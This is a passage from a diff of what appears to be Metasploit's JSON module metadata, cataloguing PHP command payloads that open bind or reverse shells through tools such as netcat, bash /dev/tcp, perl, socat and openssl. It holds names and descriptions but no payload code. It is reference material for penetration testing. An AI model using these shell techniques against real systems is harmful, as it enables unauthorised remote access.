+    ],
+    "description": "Execute an OS command from PHP.\n\nListen for a connection and spawn a command shell via perl",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_perl",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_perl",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_perl_ipv6": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (via perl) IPv6",
+    "fullname": "payload/php/unix/cmd/bind_perl_ipv6",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Samy <samy@samy.pl>",
+      "cazz <bmc@shmoo.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nListen for a connection and spawn a command shell via perl",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_perl_ipv6",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_perl_ipv6",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_r": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (via R)",
+    "fullname": "payload/php/unix/cmd/bind_r",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nContinually listen for a connection and spawn a command shell via R",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_r",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_r",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_ruby": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (via Ruby)",
+    "fullname": "payload/php/unix/cmd/bind_ruby",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "kris katterjohn <katterjohn@gmail.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nContinually listen for a connection and spawn a command shell via Ruby",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_ruby",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_ruby",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_ruby_ipv6": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (via Ruby) IPv6",
+    "fullname": "payload/php/unix/cmd/bind_ruby_ipv6",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "kris katterjohn <katterjohn@gmail.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nContinually listen for a connection and spawn a command shell via Ruby",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_ruby_ipv6",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_ruby_ipv6",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_socat_sctp": {
+    "name": "OS Command Exec, Unix Command Shell, Bind SCTP (via socat)",
+    "fullname": "payload/php/unix/cmd/bind_socat_sctp",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via socat",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_socat_sctp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_socat_sctp",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_socat_udp": {
+    "name": "OS Command Exec, Unix Command Shell, Bind UDP (via socat)",
+    "fullname": "payload/php/unix/cmd/bind_socat_udp",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via socat",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_socat_udp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_socat_udp",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_stub": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (stub)",
+    "fullname": "payload/php/unix/cmd/bind_stub",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nListen for a connection and spawn a command shell (stub only, no payload)",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_stub",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_stub",
+    "staged": false
+  },
+  "payload_php/unix/cmd/bind_zsh": {
+    "name": "OS Command Exec, Unix Command Shell, Bind TCP (via Zsh)",
+    "fullname": "payload/php/unix/cmd/bind_zsh",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Doug Prostko <dougtko@gmail.com>",
+      "Wang Yihang <wangyihanger@gmail.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nListen for a connection and spawn a command shell via Zsh. Note: Although Zsh is\noften available, please be aware it isn't usually installed by default.",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/bind_zsh",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/bind_zsh",
+    "staged": false
+  },
+  "payload_php/unix/cmd/generic": {
+    "name": "OS Command Exec, Unix Command, Generic Command Execution",
+    "fullname": "payload/php/unix/cmd/generic",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nExecutes the supplied command",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/generic",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/generic",
+    "staged": false
+  },
+  "payload_php/unix/cmd/interact": {
+    "name": "OS Command Exec, Unix Command, Interact with Established Connection",
+    "fullname": "payload/php/unix/cmd/interact",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nInteracts with a shell on an established socket connection",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/interact",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/interact",
+    "staged": false
+  },
+  "payload_php/unix/cmd/pingback_bind": {
+    "name": "OS Command Exec, Unix Command Shell, Pingback Bind TCP (via netcat)",
+    "fullname": "payload/php/unix/cmd/pingback_bind",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "asoto-r7"
+    ],
+    "description": "Execute an OS command from PHP.\n\nAccept a connection, send a UUID, then exit",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/pingback_bind",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/pingback_bind",
+    "staged": false
+  },
+  "payload_php/unix/cmd/pingback_reverse": {
+    "name": "OS Command Exec, Unix Command Shell, Pingback Reverse TCP (via netcat)",
+    "fullname": "payload/php/unix/cmd/pingback_reverse",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "asoto-r7"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates a socket, send a UUID, then exit",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/pingback_reverse",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/pingback_reverse",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse": {
+    "name": "OS Command Exec, Unix Command Shell, Double Reverse TCP (telnet)",
+    "fullname": "payload/php/unix/cmd/reverse",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell through two inbound connections",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_awk": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via AWK)",
+    "fullname": "payload/php/unix/cmd/reverse_awk",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "espreto <robertoespreto@gmail.com>",
+      "Ulisses Castro <uss.thebug@gmail.com>",
+      "Gabriel Quadros <gquadrossilva@gmail.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via GNU AWK",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_awk",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_awk",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_bash": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (/dev/tcp)",
+    "fullname": "payload/php/unix/cmd/reverse_bash",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via bash's builtin /dev/tcp.\n\nThis will not work on circa 2009 and older Debian-based Linux\ndistributions (including Ubuntu) because they compile bash\nwithout the /dev/tcp feature.",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_bash",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_bash",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_bash_telnet_ssl": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP SSL (telnet)",
+    "fullname": "payload/php/unix/cmd/reverse_bash_telnet_ssl",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via mkfifo and telnet.\nThis method works on Debian and other systems compiled\nwithout /dev/tcp support. This module uses the '-z'\noption included on some systems to encrypt using SSL.",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_bash_telnet_ssl",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_bash_telnet_ssl",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_bash_udp": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse UDP (/dev/udp)",
+    "fullname": "payload/php/unix/cmd/reverse_bash_udp",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "hdm <x@hdm.io>",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via bash's builtin /dev/udp.\n\nThis will not work on circa 2009 and older Debian-based Linux\ndistributions (including Ubuntu) because they compile bash\nwithout the /dev/udp feature.",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_bash_udp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_bash_udp",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_jjs": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via jjs)",
+    "fullname": "payload/php/unix/cmd/reverse_jjs",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "conerpirate",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nConnect back and create a command shell via jjs",
+    "references": [
+      "URL-https://gtfobins.github.io/gtfobins/jjs/",
+      "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/",
+      "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_jjs",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_jjs",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_ksh": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via Ksh)",
+    "fullname": "payload/php/unix/cmd/reverse_ksh",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Wang Yihang <wangyihanger@gmail.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nConnect back and create a command shell via Ksh.  Note: Although Ksh is often\navailable, please be aware it isn't usually installed by default.",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_ksh",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_ksh",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_lua": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via Lua)",
+    "fullname": "payload/php/unix/cmd/reverse_lua",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "xistence <xistence@0x90.nl>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via Lua",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_lua",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_lua",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_ncat_ssl": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via ncat)",
+    "fullname": "payload/php/unix/cmd/reverse_ncat_ssl",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "C_Sto"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via ncat, utilizing ssl mode",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_ncat_ssl",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_ncat_ssl",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_netcat": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via netcat)",
+    "fullname": "payload/php/unix/cmd/reverse_netcat",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "m-1-k-3",
+      "egypt <egypt@metasploit.com>",
+      "juan vazquez <juan.vazquez@metasploit.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via netcat",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_netcat",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_netcat",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_netcat_gaping": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via netcat -e)",
+    "fullname": "payload/php/unix/cmd/reverse_netcat_gaping",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via netcat",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_netcat_gaping",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_netcat_gaping",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_nodejs": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via nodejs)",
+    "fullname": "payload/php/unix/cmd/reverse_nodejs",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "joev <joev@metasploit.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nContinually listen for a connection and spawn a command shell via nodejs",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_nodejs",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_nodejs",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_openssl": {
+    "name": "OS Command Exec, Unix Command Shell, Double Reverse TCP SSL (openssl)",
+    "fullname": "payload/php/unix/cmd/reverse_openssl",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell through two inbound connections",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_openssl",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_openssl",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_perl": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP (via Perl)",
+    "fullname": "payload/php/unix/cmd/reverse_perl",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "cazz <bmc@shmoo.com>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via perl",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
+    "path": "/modules/payloads/adapters/php/unix/cmd.rb",
+    "is_install_path": true,
+    "ref_name": "php/unix/cmd/reverse_perl",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "php/unix/cmd",
+    "adapted_refname": "cmd/unix/reverse_perl",
+    "staged": false
+  },
+  "payload_php/unix/cmd/reverse_perl_ssl": {
+    "name": "OS Command Exec, Unix Command Shell, Reverse TCP SSL (via perl)",
+    "fullname": "payload/php/unix/cmd/reverse_perl_ssl",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute an OS command from PHP.\n\nCreates an interactive shell via perl, uses SSL",
+    "references": [],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-05-09 16:09:15 +0000",
